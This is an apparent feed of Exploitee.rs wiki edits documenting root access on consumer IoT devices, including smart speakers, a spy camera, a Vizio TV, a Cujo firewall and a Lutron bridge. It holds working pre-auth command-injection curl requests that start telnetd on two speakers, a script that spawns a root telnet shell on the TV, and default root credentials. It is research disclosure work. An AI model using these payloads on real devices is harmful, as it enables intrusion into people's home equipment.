		<id>https://wiki.exploitee.rs/index.php?title=Lutron_L-BDG2-WH_Caseta_Smart_Bridge&amp;diff=2864</id>
		<title>Lutron L-BDG2-WH Caseta Smart Bridge</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Lutron_L-BDG2-WH_Caseta_Smart_Bridge&amp;diff=2864"/>
		<updated>2017-08-09T05:57:23Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:LUTRON_CASETA.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Networking]]&lt;br /&gt;
&lt;br /&gt;
=Lutron L-BDG2-WH Caseta Smart Bridge=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Controlling lights, shades, and temperature from a mobile device has never been easier or more reliable. The Lutron Smart Bridge allows for setup, control, and monitoring of Caseta Wireless dimmers and Serena Remote Controlled Shades from a smartphone, tablet, and even your Apple Watch TM wearable. The Lutron Smart Bridge also works with Apple HomeKit, Nest, select Honeywell Thermostats, Logitech Harmony remotes, and more. Schedule lights to adjust automatically based on the time of day, or create your favorite scenes that adjust multiple lights and shades with the press of a button. Enable geofencing to automatically turn your lights on/off when you leave or approach home, or to notify you that you left your lights on. All compatible products sold separately.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/LUTRON-L-BDG2-WH-Caseta-Wireless-HomeKit-enabled/dp/B00XPW67ZM/ref=as_li_ss_tl?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502255332&amp;amp;sr=8-1&amp;amp;keywords=Lutron+LBDG2WH+Caseta+Smart&amp;amp;linkCode=ll1&amp;amp;tag=exploiteers-20&amp;amp;linkId=9245f587e1e259b8b10ab1e785d9411e Purchase the Lutron L-BDG2-WH at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Hardware Root==&lt;br /&gt;
The UART interface on this device is located [pictured], and runs at ????????. Once the device completes booting, a root shell is executed on the UART TTY.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
LUTRON_CASETA_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===UART Output===&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=MUZO_Cobblestone&amp;diff=2863</id>
		<title>MUZO Cobblestone</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=MUZO_Cobblestone&amp;diff=2863"/>
		<updated>2017-08-09T05:39:14Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:IOT  =MUZO Cobblestone=  &amp;quot;MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wirel...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:MUZO.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=MUZO Cobblestone=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;MUZO Cobblestone is a Wi-Fi Audio Receiver that makes your speakers wireless. Now you can control music play to your speakers without having to connect your audio cable to your speakers. Cobblestone is easy to set-up. Just connect your Cobblestone to your speaker, amplifier or receiver, and configure your Cobblestone to your home Wi-Fi network with our MUZO Player app and start streaming your favorite music. It’s as easy as that. AirPlay multi-room is supported for Cobblestones and not yet supported for 3rd party Airplay devices.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/MUZO-Cobblestone-Wi-Fi-Audio-Receiver/dp/B00N9NZIKM Purchase the MUZO Cobblestone at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Telnet Default Credentials==&lt;br /&gt;
&lt;br /&gt;
Device permits logins as root with username &amp;lt;code&amp;gt;admin&amp;lt;/code&amp;gt; and password &amp;lt;code&amp;gt;admin&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Pre Auth Root Command Injection==&lt;br /&gt;
&lt;br /&gt;
Target: /httpapi.asp&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.43.37/httpapi.asp&#039; -H &#039;CONTENT-TYPE: application/x-www-form-urlencoded&#039; -H &#039;Accept: */*&#039; -H &#039;Cache-Control: no-cache&#039; -H &#039;Connection: keep-alive&#039; -H &#039;If-Modified-Since: 0, 0&#039; --data &#039;command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0&#039; --compressed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connect to the telnet service as root&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:MUZO.JPG&amp;diff=2862</id>
		<title>File:MUZO.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:MUZO.JPG&amp;diff=2862"/>
		<updated>2017-08-09T05:38:46Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=GGMM_E3_Smart_Speaker&amp;diff=2861</id>
		<title>GGMM E3 Smart Speaker</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=GGMM_E3_Smart_Speaker&amp;diff=2861"/>
		<updated>2017-08-09T05:34:23Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:IOT  =GGMM E3 Smart Speaker=  &amp;quot;Enjoy the full rich sound by wirelessly streaming your favirote mu...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:GGMME3.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=GGMM E3 Smart Speaker=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/GGMM-Speakers-Multi-Room-Bluetooth-Compatible/dp/B01E3MXHKA Purchase the GGMM E3 Smart Speaker at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Pre Auth Root Command Injection==&lt;br /&gt;
&lt;br /&gt;
Target: /httpapi.asp&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
curl &#039;http://192.168.43.37/httpapi.asp&#039; -H &#039;CONTENT-TYPE: application/x-www-form-urlencoded&#039; -H &#039;Accept: */*&#039; -H &#039;Cache-Control: no-cache&#039; -H &#039;Connection: keep-alive&#039; -H &#039;If-Modified-Since: 0, 0&#039; --data &#039;command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0&#039; --compressed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connect to the telnet service as root&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:GGMME3.JPG&amp;diff=2860</id>
		<title>File:GGMME3.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:GGMME3.JPG&amp;diff=2860"/>
		<updated>2017-08-09T05:33:13Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Cujo&amp;diff=2859</id>
		<title>Cujo</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Cujo&amp;diff=2859"/>
		<updated>2017-08-09T05:29:04Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:CUJO.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=Cujo=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;CUJO shields your home devices against hacks. CUJO network security firewall protects your computers and IoT devices against malware, ransomware, viruses, and other hacking threats. Think of it as advanced antivirus for all your connected devices - from laptops to smartphones.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/CUJO-Internet-Security-Firewall-SUBSCRIPTION/dp/B01MSEX7PT/ref=sr_1_1?ie=UTF8&amp;amp;qid=1502255730&amp;amp;sr=8-1&amp;amp; Purchase the Cujo at Amazon]&lt;br /&gt;
&lt;br /&gt;
==UART==&lt;br /&gt;
&lt;br /&gt;
The UART Interface runs at ???????? baud at the pinout pictured&lt;br /&gt;
&lt;br /&gt;
Drop to a U-Boot shell by grounding the eMMC data line at the right spot&lt;br /&gt;
&lt;br /&gt;
After stage 1, while stage 2 is booting, hold for 3-4 seconds to ground&lt;br /&gt;
&lt;br /&gt;
???????????&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
CUJO_GLUE.JPG&lt;br /&gt;
CUJO_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Boot Output===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
OCTEON eMMC stage 1 bootloader (CUJOv1.0)&lt;br /&gt;
Loading stage2&lt;br /&gt;
Success.&lt;br /&gt;
Branching to stage 2 at: 0xFFFFFFFF81000000&lt;br /&gt;
U-Boot 2013.07 (Development build, svnversion: u-boot:directory, exec:) (Build time: Dec 22 2016 - 21:42:51)&lt;br /&gt;
Cavium Inc. OCTEON SDK version 3.1.2, build 568: $Revision: 128476 $&lt;br /&gt;
EARLY FILL COUNT                              : 14, cpu_hertz:1000000000, ddr_hertz:666000000&lt;br /&gt;
LMC0 Asserting DDR_RESET_L&lt;br /&gt;
DDR Reference Hertz = 50000000&lt;br /&gt;
clkr:  0, en[5]:  6, clkf:   79, pll_MHz: 4000, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  0, en[2]:  3, clkf:   39, pll_MHz: 2000, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  1, en[2]:  3, clkf:   79, pll_MHz: 2000, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  2, en[2]:  3, clkf:  119, pll_MHz: 2000, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  2, en[1]:  2, clkf:   79, pll_MHz: 1333, ddr_hertz: 666666666, error:  -666666&lt;br /&gt;
clkr:  0, en[5]:  6, clkf:   79, pll_MHz: 4000, ddr_hertz: 666666666, error:  -666666 &amp;lt;==&lt;br /&gt;
LMC0 De-asserting DDR_RESET_L&lt;br /&gt;
LMC0: Measured DDR clock: 666666794, cpu clock: 1000000000, ddr clocks: 133333699&lt;br /&gt;
LMC0: measured speed: 666666794 hz&lt;br /&gt;
Initializing node 0 DDR interface 0, DDR Clock 666666794, DDR Reference Clock 50000000, CPUID 0x000d9602&lt;br /&gt;
DDR SPD Table:&lt;br /&gt;
DIMM 0: DDR3 UDIMM, non-ECC  D3-56CG107JT9V-999  chksum: 49305 (0xc099) 1.5V&lt;br /&gt;
row bits: 15, col bits: 10, bank bits: 3, banks: 8, ranks: 1, dram width: 16, size: 1024 MB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:VERAEDGE_LFD_ROOT.JPG&amp;diff=2858</id>
		<title>File:VERAEDGE LFD ROOT.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:VERAEDGE_LFD_ROOT.JPG&amp;diff=2858"/>
		<updated>2017-08-09T05:26:15Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:VERAEDGE.JPG&amp;diff=2857</id>
		<title>File:VERAEDGE.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:VERAEDGE.JPG&amp;diff=2857"/>
		<updated>2017-08-09T05:26:07Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Cujo&amp;diff=2856</id>
		<title>Cujo</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Cujo&amp;diff=2856"/>
		<updated>2017-08-09T05:20:03Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:IOT  =Cujo=  &amp;quot;CUJO shields your home devices against hacks. CUJO network security firewall protects...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:CUJO.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:IOT]]&lt;br /&gt;
&lt;br /&gt;
=Cujo=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;CUJO shields your home devices against hacks. CUJO network security firewall protects your computers and IoT devices against malware, ransomware, viruses, and other hacking threats. Think of it as advanced antivirus for all your connected devices - from laptops to smartphones.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/CUJO-Internet-Security-Firewall-SUBSCRIPTION/dp/B01MSEX7PT/ref=sr_1_1?ie=UTF8&amp;amp;qid=1502255730&amp;amp;sr=8-1&amp;amp; Purchase the Cujo at Amazon]&lt;br /&gt;
&lt;br /&gt;
==UART==&lt;br /&gt;
&lt;br /&gt;
The UART Interface runs at ???????? baud at the pinout pictured&lt;br /&gt;
&lt;br /&gt;
Drop to a U-Boot shell by grounding the eMMC data line at the right spot&lt;br /&gt;
&lt;br /&gt;
After stage 1, while stage 2 is booting, hold for 3-4 seconds to ground&lt;br /&gt;
&lt;br /&gt;
???????????&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
CUJO_GLUE.JPG&lt;br /&gt;
CUJO_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:CUJO_UART.JPG&amp;diff=2855</id>
		<title>File:CUJO UART.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:CUJO_UART.JPG&amp;diff=2855"/>
		<updated>2017-08-09T05:19:11Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:CUJO_GLUE.JPG&amp;diff=2853</id>
		<title>File:CUJO GLUE.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:CUJO_GLUE.JPG&amp;diff=2853"/>
		<updated>2017-08-09T05:19:03Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:CUJO.JPG&amp;diff=2852</id>
		<title>File:CUJO.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:CUJO.JPG&amp;diff=2852"/>
		<updated>2017-08-09T05:18:53Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=AOBO_Hidden_Spy_Camera_720P&amp;diff=2850</id>
		<title>AOBO Hidden Spy Camera 720P</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=AOBO_Hidden_Spy_Camera_720P&amp;diff=2850"/>
		<updated>2017-08-09T05:14:29Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:Camera  =AOBO Hidden Spy Camera 720P=  &amp;quot;AOBO Hidden 720p Camera features a high definition 1280x720...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:AOBO.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Camera]]&lt;br /&gt;
&lt;br /&gt;
=AOBO Hidden Spy Camera 720P=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;AOBO Hidden 720p Camera features a high definition 1280x720P video resolution. This hidden camera is the world&#039;s smallest HD camera which makes it the perfect camera and video recording or forensic tool for anyone. With its portable and hidden nature can record what happens at every moment.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/Hidden-Camera-Wireless-Portable-Security/dp/B06XVDHTXR/ref=sr_1_1?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1502255449&amp;amp;sr=1-1&amp;amp; Purchase the AOBO Hidden Spy Camera 720P at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Open Wifi and Passwordless Telnet==&lt;br /&gt;
The Camera creates an open wireless access point, and spawns a Telnet and FTP service. Login using username root with no password.&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:AOBO.JPG&amp;diff=2849</id>
		<title>File:AOBO.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:AOBO.JPG&amp;diff=2849"/>
		<updated>2017-08-09T05:13:49Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Vizio_P602UI&amp;diff=2848</id>
		<title>Vizio P602UI</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Vizio_P602UI&amp;diff=2848"/>
		<updated>2017-08-09T05:09:23Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:Television  =Vizio P602UI=  &amp;quot;Simply Beautiful! Introducing the all-new VIZIO P-Series Ultra...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:VIZIO_P602UI.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Television]]&lt;br /&gt;
&lt;br /&gt;
=Vizio P602UI=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Simply Beautiful! Introducing the all-new VIZIO P-Series Ultra HD Full-Array LED Smart TV. With powerful Ultra HD performance and best-in-class picture quality of Full-Array LED backlight, 64 Active LED Zones, and Clear Action 960 for incomparable contrast levels, sharpest details and deepest, purest black levels, the P-Series is your crystal-clear window to an exhilarating world where picture is everything. In addition, P-Series is fully equipped and ready for nearly all Ultra HD entertainment options. With support for HEVC decoding and the latest Wi-Fi standard 802.11ac, P-Series lets you stream Ultra HD from popular apps such as Netflix. Its superior Spatial Scaling Engine accurately and beautifully transforms your favorite 1080p Full HD sports, movies, and TV shows into spectacular Ultra HD. And support for the latest HDMI standards enables Ultra HD playback from next generation cable and satellite receivers, Blu-ray players and game consoles. The VIZIO P-Series: Simply Beautiful.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/VIZIO-P602ui-B3-60-Inch-Ultra-Smart/dp/B00M2FBEG0 Purchase the Vizio P602UI at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Hardware Root==&lt;br /&gt;
The eMMC chip on this device is located [pictured]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
VIZIO_P602UI_EMMC.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
dump emmc&lt;br /&gt;
&lt;br /&gt;
review filesystem&lt;br /&gt;
&lt;br /&gt;
add persistent telnet shell&lt;br /&gt;
&lt;br /&gt;
==Software Root==&lt;br /&gt;
&lt;br /&gt;
TV has a HTML User Manual, opened via the &amp;quot;hidden&amp;quot; Opera Browser. The User Manual has an update procedure which downloads a tar file, uses gpg for signing.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
sigma.exec(&amp;quot;wget https://....&amp;quot;);&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A custom App can open a webpage on the local filesystem&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
URL=file://rw_data/yahoo/data/Widgets/Installed/5.com.exploiteers.1.widget/Contents/vizio.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Custom HTML page contains&lt;br /&gt;
&amp;lt;pre style=&amp;quot;white-space: pre-wrap;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
var sigma = new SigmaBridge();&lt;br /&gt;
sigma.exec(&amp;quot;/bin/busybox telnetd -l/bin/sh -p1337&amp;quot;);&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Launch the app, log in via telnet or netcat&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:VIZIO_P602UI_EMMC.JPG&amp;diff=2847</id>
		<title>File:VIZIO P602UI EMMC.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:VIZIO_P602UI_EMMC.JPG&amp;diff=2847"/>
		<updated>2017-08-09T05:09:09Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:VIZIO_P602UI.JPG&amp;diff=2846</id>
		<title>File:VIZIO P602UI.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:VIZIO_P602UI.JPG&amp;diff=2846"/>
		<updated>2017-08-09T05:09:01Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Lutron_L-BDG2-WH_Caseta_Smart_Bridge&amp;diff=2844</id>
		<title>Lutron L-BDG2-WH Caseta Smart Bridge</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Lutron_L-BDG2-WH_Caseta_Smart_Bridge&amp;diff=2844"/>
		<updated>2017-08-09T04:59:23Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:Networking  =Lutron L-BDG2-WH Caseta Smart Bridge=  &amp;quot;Controlling lights, shades, and tempe...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:LUTRON_CASETA.JPG|120px|left|thumb]]&lt;br /&gt;
[[Category:Networking]]&lt;br /&gt;
&lt;br /&gt;
=Lutron L-BDG2-WH Caseta Smart Bridge=&lt;br /&gt;
&lt;br /&gt;
&amp;quot;Controlling lights, shades, and temperature from a mobile device has never been easier or more reliable. The Lutron Smart Bridge allows for setup, control, and monitoring of Caseta Wireless dimmers and Serena Remote Controlled Shades from a smartphone, tablet, and even your Apple Watch TM wearable. The Lutron Smart Bridge also works with Apple HomeKit, Nest, select Honeywell Thermostats, Logitech Harmony remotes, and more. Schedule lights to adjust automatically based on the time of day, or create your favorite scenes that adjust multiple lights and shades with the press of a button. Enable geofencing to automatically turn your lights on/off when you leave or approach home, or to notify you that you left your lights on. All compatible products sold separately.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/LUTRON-L-BDG2-WH-Caseta-Wireless-HomeKit-enabled/dp/B00XPW67ZM/ref=sr_1_1?s=hi&amp;amp;ie=UTF8&amp;amp;qid=1502254549&amp;amp;sr=1-18 Purchase the Lutron L-BDG2-WH at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Hardware Root==&lt;br /&gt;
The UART interface on this device is located [pictured], and runs at ????????. Once the device completes booting, a root shell is executed on the UART TTY.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery&amp;gt;&lt;br /&gt;
LUTRON_CASETA_UART.JPG&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===UART Output===&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:LUTRON_CASETA_UART.JPG&amp;diff=2843</id>
		<title>File:LUTRON CASETA UART.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:LUTRON_CASETA_UART.JPG&amp;diff=2843"/>
		<updated>2017-08-09T04:59:11Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=File:LUTRON_CASETA.JPG&amp;diff=2841</id>
		<title>File:LUTRON CASETA.JPG</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=File:LUTRON_CASETA.JPG&amp;diff=2841"/>
		<updated>2017-08-09T04:59:00Z</updated>

		<summary type="html">&lt;p&gt;0x00string: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>0x00string</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Samsung_SL-M3320ND&amp;diff=2840</id>
		<title>Samsung SL-M3320ND</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Samsung_SL-M3320ND&amp;diff=2840"/>
		<updated>2017-08-09T04:52:00Z</updated>

		<summary type="html">&lt;p&gt;0x00string: Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} thumb Category:Networking  =Samsung SL-M3320ND Printer=  &amp;quot;The robust ProXpress M3320ND features print...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
